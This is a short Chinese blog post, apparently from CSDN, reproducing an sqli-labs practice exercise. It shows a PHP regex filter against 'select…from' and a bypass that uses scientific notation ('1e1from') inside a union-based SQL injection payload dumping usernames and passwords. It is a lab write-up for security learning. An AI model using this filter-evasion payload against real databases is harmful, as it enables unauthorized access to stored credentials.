sqli-labs例题复现

最新推荐文章于 2024-07-03 09:46:57 发布
最新推荐文章于 2024-07-03 09:46:57 发布
阅读量127 收藏
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hdlaichi_/article/details/132669407
版权

less-1.1

在源码中$id=$_GET['id'];之后加入如下代码:

if(preg_match('/select\b[\s\S]*\bfrom/is',$id)){
    die('SQL Injection');
};
1.分析正则

第一个\b匹配select单词边界,\s\S匹配到所有字符,最后一个\b匹配到from单词边界。

select...from被过滤,失效。

2.科学计数法的引入

如果可以存在一个关键词,可以加在from前面,不会影响语句执行,从而实现绕过正则。

select group_concat(username,0x3a,password),le1from users;
 
1e1

上图中,相当于多出了一列le1,所以前面必须要有逗号。

 ?id=-1' union select 1,concat(username,0x3a,password),1e1from users limit 2,1--+

hdlaichi_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF从入门到提升
anquanniu的博客
07-10 5381
CTF选手的操作都是像吴白那么帅嘛?如何入门CTF比赛,一篇经验带你入门。 CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球大会,以代替之前们通过互相发起真实***进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式。 入门CTF的内容会从CTF中WEB...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 16万+
目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 通信安全 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
网络安全-自学笔记_网络安全学习
2401_84253089的博客
04-29 493
2、看雪论坛是个软件安全技术交流场所,为安全技术爱好者提供一个技术交流平台和资源。3、吾爱破解论坛是致力于软件安全与病毒分析的非营利性技术论坛。4、一个开放型技术平台。5、各种CVE,漏洞。6、安全维基,各种安全资讯。
2024年网络安全最新网络安全-自学笔记_网络安全学习
2401_84240189的博客
05-02 988
入门进阶。
2024年网络安全最全网络安全-自学笔记_网络安全学习
2401_84252743的博客
05-03 590
5、各种CVE,漏洞。6、安全维基,各种安全资讯。
2024年最新网络安全-自学笔记_网络安全学习(1),2024年最新关于网络安全程序员最近的状况
2401_84265909的博客
05-06 841
和我一起来学习WEB安全吧!----------------------------------理论与实战------------------------------------------------------------------------理论与实战-------------------------------------------------------------------------实战-------------------------------------
SQL注入:二次注入
qq_68163788的博客
01-29 1822
二次注入是SQL注入攻击的一种变体,它发生在应用程序对用户输入进行了过滤和防御措施的情况下。在这种情况下,攻击者可能会利用应用程序中的另一个漏洞,例如存储型XSS漏洞,来注入恶意的SQL代码。这种情况下,攻击者利用应用程序中的另一个漏洞来实现对数据库的注入攻击,因此被称为二次注入。 要防止二次注入攻击,开发人员需要实施全面的安全措施,包括对用户输入进行严格的验证和过滤,使用参数化查询或者存储过程等安全的数据库访问方法,以及定期进行安全审计和漏洞扫描。
Web 方向学习路线
Love&Share
01-10 2090
文档由齐鲁师范学院网络安全社团授权发布,关注官方公众号获得更多技术类文章 入门 安全职业介绍 以下几项没有先后顺序,不是说要把编程语言精通之后再去学习后边的,而是可以一边学语言一边学漏洞,自己不知道咋规划建议看学习资料-综合教程部分,入门还是以CTF为主 前导 提问的智慧 https://github.com/ryanhanwu/How-To-Ask-Questions-The-Smart-Way/blob/main/README-zh_CN.md 以下根据自己的学习方法来,如果觉得看字太慢的话,可
常用的网络安全靶场、工具箱、学习路线推荐
网络安全
04-18 1550
本公众号名称从“网络安全研究所”正式改为“网络安全实验室”有招聘需求的可以后台联系运营人员。对于想学习或者参加CTF比赛的朋友来说,CTF工具、练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助。CTF在线工具首先给大家推荐我自己常用的3个CTF在线工具网站,内容齐全,收藏备用。1、CTF在线工具箱:http://ctf.ssleye.com/ 包含CTF比赛中常...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs.rar
12-22
sqli-labs是一个专门设计用于学习和练习SQL注入技术的平台,特别适合初学者了解和提升SQL注入防御技能。 首先,要搭建sqli-labs,你需要准备以下工具: 1. PHPstudy:一个集成的Web服务器环境,包括Apache、Nginx、...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
hive安装
m0_74934794的博客
06-27 297
把hive的压缩包上传到虚拟机的目录我这里是解压文件到 /opt/softs修改文件名到中配置环境变量添加退出后一下把mysqljar包丢进来。
2023年全国职业院校技能大赛(高职组)“云计算应用”赛项赛卷9(容器云)
wangchuan_yyd的博客
06-29 603
2023年全国职业院校技能大赛(高职组)“云计算应用”赛项赛卷9(容器云)
QT学习积累——方法参数加const和不加const的区别
最新发布
Arya的博客,专注后端领域
07-03 699
QT学习积累——方法参数加const和不加const的区别
binlog与redolog的区别
德乐懿的博客
06-27 446
在实际应用中,数据库管理员需要根据具体的需求和场景来合理配置和使用这两种日志系统,以确保数据库的高效、稳定运行。在数据库管理系统中,日志系统扮演着至关重要的角色,它记录了数据库的所有更改,从而确保在发生故障时能够恢复数据。其中,binlog(二进制日志)和redolog(重做日志)是两种不同类型的日志,它们在功能、特点和应用场景上存在显著差异。binlog是MySQL的二进制日志系统,它记录了所有更改数据库数据的语句的信息,以事件的形式保存。这些事件包含了更改的具体内容,可以用来进行数据复制和恢复。
sqli-labs复现
09-08
要使用PHPStudy搭建SQLi-Labs,您可以按照以下步骤进行操作: 1.下载SQLi-Labs:您可以从GitHub上下载SQLi-Labs的代码并将其解压缩到您的本地计算机上。 2.安装PHPStudy:您可以从PHPStudy官网下载适用于您操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值